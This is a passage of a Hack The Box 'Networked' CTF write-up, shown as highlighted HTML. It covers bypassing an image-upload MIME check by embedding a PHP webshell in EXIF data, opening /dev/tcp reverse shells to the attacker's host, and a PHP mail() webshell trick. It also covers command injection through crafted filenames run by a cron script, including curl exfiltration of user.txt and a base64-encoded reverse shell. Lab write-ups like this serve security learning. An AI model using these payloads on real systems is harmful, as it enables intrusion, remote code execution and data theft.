punctuation\">;</span>\n      <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">function_exists</span><span class=\"token punctuation\">(</span><span class=\"token string 
single-quoted-string\">'mime_content_type'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$file_type</span> <span class=\"token operator\">=</span> @<span class=\"token function\">mime_content_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'tmp_name'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file_type</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token comment\">// It's possible that mime_content_type() returns FALSE or an empty string</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">return</span> <span class=\"token variable\">$file_type</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token variable\">$file</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'type'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">function</span> <span class=\"token function-definition function\">check_file_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token 
punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token variable\">$mime_type</span> <span class=\"token operator\">=</span> <span class=\"token function\">file_mime_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$mime_type</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'image/'</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">===</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">return</span> <span class=\"token constant boolean\">true</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">return</span> <span class=\"token constant boolean\">false</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>  \n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Actually running it helps understand the behavior.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">php -S <span class=\"token number\">127.0</span>.0.1:8080</code></pre></div>\n<h3 id=\"embedding-a-php-script-in-an-image-file-using-exiftool\" style=\"position:relative;\"><a href=\"#embedding-a-php-script-in-an-image-file-using-exiftool\" aria-label=\"embedding a php script in an image file using exiftool permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" 
focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Embedding a PHP Script in an Image File Using exiftool</h3>\n<p>I found that to upload the script, I first need to bypass the MIME type check here:</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token variable\">$mime_type</span> <span class=\"token operator\">=</span> <span class=\"token function\">file_mime_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$file</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$mime_type</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'image/'</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">===</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>I embedded a command using the following:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># For testing</span>\nexiftool -documentname<span class=\"token operator\">=</span><span class=\"token string\">'&lt;?php echo \"foobarbaz\"; ?>'</span> test.jpg\n<span class=\"token function\">mv</span> test.jpg test.php.jpg\n\nexiftool 
-documentname<span class=\"token operator\">=</span><span class=\"token string\">'&lt;?php system($_GET['</span>cmd<span class=\"token string\">']); ?>'</span> test.jpg\n<span class=\"token function\">mv</span> test.jpg test.php.jpg\n\n<span class=\"token comment\">###############</span>\n$ <span class=\"token function\">file</span> test.php.jpg \ntest.php.jpg: JPEG image data, JFIF standard <span class=\"token number\">1.01</span>, aspect ratio, density 1x1, segment length <span class=\"token number\">16</span>, comment: <span class=\"token string\">\"&lt;?php system(['cmd']); ?>\"</span>, baseline, precision <span class=\"token number\">8</span>, 1x30, components <span class=\"token number\">3</span></code></pre></div>\n<p>Reference: <a href=\"https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Bypass File Upload Filtering · Total OSCP Guide</a></p>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/pentesting-web/file-upload\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">File Upload - HackTricks</a></p>\n<p>After uploading this file, I can get a reverse shell by connecting to the server with the following query:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">curl</span> -G --data-urlencode <span class=\"token string\">\"cmd=bash -c '/bin/bash -l > /dev/tcp/10.10.14.2/4444 0&lt;&amp;1 2>&amp;1'\"</span> http://10.10.10.146/uploads/10_10_14_2.php.jpg <span class=\"token operator\">|</span> <span class=\"token function\">cat</span></code></pre></div>\n<p>However, since the web server user privileges don’t allow me to access the flag, I need to continue enumerating internally.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">whoami</span>\napache\n\n$ <span 
class=\"token function\">ls</span> /home/guly\ncheck_attack.php\ncrontab.guly\nuser.txt\n\n$ <span class=\"token function\">cat</span> user.txt\ncat: user.txt: Permission denied</code></pre></div>\n<p>By the way, after checking a writeup, it seems RCE is also possible without embedding into exif data:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">root@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># cp original.png ./test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># echo '&lt;?php' >> test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># echo 'passthru(\"whoami\");' >> test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># echo '?>' >> test.png</span>\nroot@kali:~/Desktop/HTB/boxes/networked<span class=\"token comment\"># mv test.png test.php.png</span></code></pre></div>\n<h3 id=\"obtaining-user-privileges\" style=\"position:relative;\">Obtaining User Privileges</h3>\n<p>Exploring internally, I found <code class=\"language-text\">check_attack.php</code> and a crontab running with user privileges.</p>\n<p>The following cron runs <code class=\"language-text\">check_attack.php</code> with guly’s privileges every 3 minutes:</p>\n<div class=\"gatsby-highlight\" 
data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">cat</span> crontab.guly\n*/3 * * * * php /home/guly/check_attack.php</code></pre></div>\n<p>Since this script runs as the user via cron, I might be able to get a shell if I can achieve RCE through it.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"># check_attack.php\n<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n<span class=\"token keyword\">require</span> <span class=\"token string single-quoted-string\">'/var/www/html/lib.php'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$path</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'/var/www/html/uploads/'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$logpath</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'/tmp/attack.log'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$to</span> <span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">'guly'</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$msg</span><span class=\"token operator\">=</span> <span class=\"token string single-quoted-string\">''</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$headers</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"X-Mailer: check_attack.php\\r\\n\"</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token variable\">$files</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span 
class=\"token variable\">$files</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_grep</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'/^([^.])/'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">scandir</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$path</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">foreach</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$files</span> <span class=\"token keyword\">as</span> <span class=\"token variable\">$key</span> <span class=\"token operator\">=></span> <span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$msg</span><span class=\"token operator\">=</span><span class=\"token string single-quoted-string\">''</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$value</span> <span class=\"token operator\">==</span> <span class=\"token string single-quoted-string\">'index.html'</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">continue</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token comment\">#echo \"-------------\\n\";</span>\n\n  <span class=\"token comment\">#print \"check: $value\\n\";</span>\n  <span class=\"token keyword\">list</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span> <span 
class=\"token operator\">=</span> <span class=\"token function\">getnameCheck</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$check</span> <span class=\"token operator\">=</span> <span class=\"token function\">check_ip</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$check</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"attack!\\n\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token comment\"># todo: attach file</span>\n    <span class=\"token function\">file_put_contents</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$logpath</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">FILE_APPEND</span> <span class=\"token operator\">|</span> <span class=\"token class-name\">LOCK_EX</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"rm -f <span class=\"token 
interpolation\"><span class=\"token variable\">$logpath</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"nohup /bin/rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span> > /dev/null 2>&amp;1 &amp;\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\\n\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">mail</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$to</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$headers</span><span class=\"token punctuation\">,</span> <span class=\"token string double-quoted-string\">\"-F<span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>The code roughly performs the following:</p>\n<ol>\n<li>Split the uploaded file into its extension and filename</li>\n<li>Check whether the filename matches the format of an IP address</li>\n<li>If the 
filename is malformed, log it and send an email via the mail function</li>\n</ol>\n<p>Here is the relevant code collected:</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token keyword\">function</span> <span class=\"token function-definition function\">getnameCheck</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$filename</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token variable\">$pieces</span> <span class=\"token operator\">=</span> <span class=\"token function\">explode</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$filename</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$name</span><span class=\"token operator\">=</span> <span class=\"token function\">array_shift</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$pieces</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'_'</span><span class=\"token punctuation\">,</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">implode</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span 
class=\"token punctuation\">,</span><span class=\"token variable\">$pieces</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\">#echo \"name $name - ext $ext\\n\";</span>\n  <span class=\"token keyword\">return</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">function</span> <span class=\"token function-definition function\">check_ip</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$prefix</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$filename</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token comment\">//echo \"prefix: $prefix - fname: $filename&lt;br>\\n\";</span>\n  <span class=\"token variable\">$ret</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">true</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token function\">filter_var</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$prefix</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">FILTER_VALIDATE_IP</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$ret</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">false</span><span 
class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$msg</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"4tt4ck on file \"</span><span class=\"token operator\">.</span><span class=\"token variable\">$filename</span><span class=\"token operator\">.</span><span class=\"token string double-quoted-string\">\": prefix is not a valid ip \"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$msg</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$filename</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$ret</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$msg</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token keyword\">list</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> <span class=\"token function\">getnameCheck</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$check</span> <span class=\"token operator\">=</span> <span class=\"token function\">check_ip</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$value</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$check</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"attack!\\n\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\"># todo: attach file</span>\n  <span class=\"token function\">file_put_contents</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$logpath</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">FILE_APPEND</span> <span class=\"token operator\">|</span> <span class=\"token class-name\">LOCK_EX</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$logpath</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"nohup /bin/rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span 
class=\"token interpolation\"><span class=\"token variable\">$value</span></span> > /dev/null 2>&amp;1 &amp;\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\\n\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">mail</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$to</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$msg</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$headers</span><span class=\"token punctuation\">,</span> <span class=\"token string double-quoted-string\">\"-F<span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://webkaru.net/php/function-file-put-contents/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PHP Function - Write String to File - file_put_contents() - PHP Beginner’s Guide Karma</a></p>\n<p>Reference: <a href=\"https://www.php.net/manual/en/function.mail.php\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PHP: mail - Manual</a></p>\n<p>Reference: <a href=\"https://www.w3schools.com/php/phptryit.asp?filename=tryphp_func_string_implode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PHP Tryit Editor v1.2</a></p>\n<p>Here, if we can control the 5th argument of PHP’s <code class=\"language-text\">mail</code> function, we might be able to get a reverse shell via 
RCE.</p>\n<p>Using the <code class=\"language-text\">-X</code> option in the 5th argument of <code class=\"language-text\">mail</code> allows writing logs to an arbitrary file, so it’s possible to achieve RCE by injecting a script into something like <code class=\"language-text\">/var/www/html/rce.php</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\">$to = 'a@b.c';\n$subject = '<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span> <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"cmd\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token delimiter important\">?></span></span>';\n$message = '';\n$headers = '';\n$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';\nmail($to, $subject, $message, $headers, $options);</code></pre></div>\n<p>Reference: <a href=\"https://www.saotn.org/exploit-phps-mail-get-remote-code-execution/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Exploit PHP’s mail() to get remote code execution - Sysadmins of the North</a></p>\n<p>However, the method in the above article doesn’t seem to give a <code class=\"language-text\">guly</code> shell, so another approach is needed to execute commands from within <code class=\"language-text\">check_attack.php</code>.</p>\n<p>I searched for mail function vulnerabilities for a while but couldn’t find a way to execute commands from <code class=\"language-text\">check_attack.php</code>.</p>\n<p>Shifting perspective to look a few lines earlier, I noticed a line that directly embeds <code class=\"language-text\">$path$value</code> into the <code class=\"language-text\">exec</code> function.</p>\n<p>Since <code 
class=\"language-text\">$value</code> can be freely overwritten via the filename, this line appears to have a command injection vulnerability.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$logpath</span></span>\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"nohup /bin/rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span> > /dev/null 2>&amp;1 &amp;\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\\n\"</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>So I tested it.</p>\n<p>On my local machine, I listen for ICMP:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> tcpdump -i tun0 icmp</code></pre></div>\n<p>Then on the remote server, I ran the following command, waited 3 minutes, and confirmed that command injection succeeded:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">touch</span> <span class=\"token string\">\"test.php &amp;&amp; ping 
10.10.14.2\"</span></code></pre></div>\n<p>Now I steal <code class=\"language-text\">user.txt</code>.</p>\n<p>By creating the following file, I can send a GET request to my own server with the contents of <code class=\"language-text\">user.txt</code> as a query parameter, and retrieve the flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">touch</span> <span class=\"token string\">\"test.php &amp;&amp; curl 10.10.14.2?flag=\\<span class=\"token variable\"><span class=\"token variable\">`</span><span class=\"token function\">cat</span> user.txt<span class=\"token punctuation\">\\</span><span class=\"token variable\">`</span></span>\"</span></code></pre></div>\n<p>Since Linux filenames cannot contain <code class=\"language-text\">/</code>, this roundabout command is necessary.</p>\n<h3 id=\"getting-a-user-level-shell\" style=\"position:relative;\"><a href=\"#getting-a-user-level-shell\" aria-label=\"getting a user level shell permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Getting a User-Level Shell</h3>\n<p>Next I want to get root, but first I’ll secure a user-level shell.</p>\n<p>Although slashes cannot be used in filenames, I work around this with Base64.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"bash -c '/bin/bash -l > 
/dev/tcp/10.10.14.2/9999 0&lt;&amp;1 2>&amp;1'\"</span> <span class=\"token operator\">|</span> base64\n<span class=\"token comment\"># YmFzaCAtYyAnL2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMi85OTk5IDA8JjEgMj4mMScK</span>\n\n<span class=\"token function\">touch</span> <span class=\"token string\">\"test.php &amp;&amp; echo YmFzaCAtYyAnL2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMi85OTk5IDA8JjEgMj4mMScK | base64 -d > rev.sh &amp;&amp; bash rev.sh\"</span></code></pre></div>\n<p>By embedding Base64-encoded commands this way, arbitrary code can be executed without using slashes.</p>\n<p><img class=\"gatsby-resp-image-image\" src=\"/static/7bf72bb340acda5567bf873227769f89/5c6e9/image-20220528161540242.png\" alt=\"image-20220528161540242\" title=\"image-20220528161540242\" loading=\"lazy\"></p>\n<p>Checking sudo privileges, there is a conspicuous file <code class=\"language-text\">changename.sh</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> -l\nMatching Defaults entries <span class=\"token keyword\">for</span> guly on networked:\n    <span class=\"token operator\">!</span>visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,\n    env_reset, <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">=</span><span class=\"token string\">\"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\"</span>,\n    
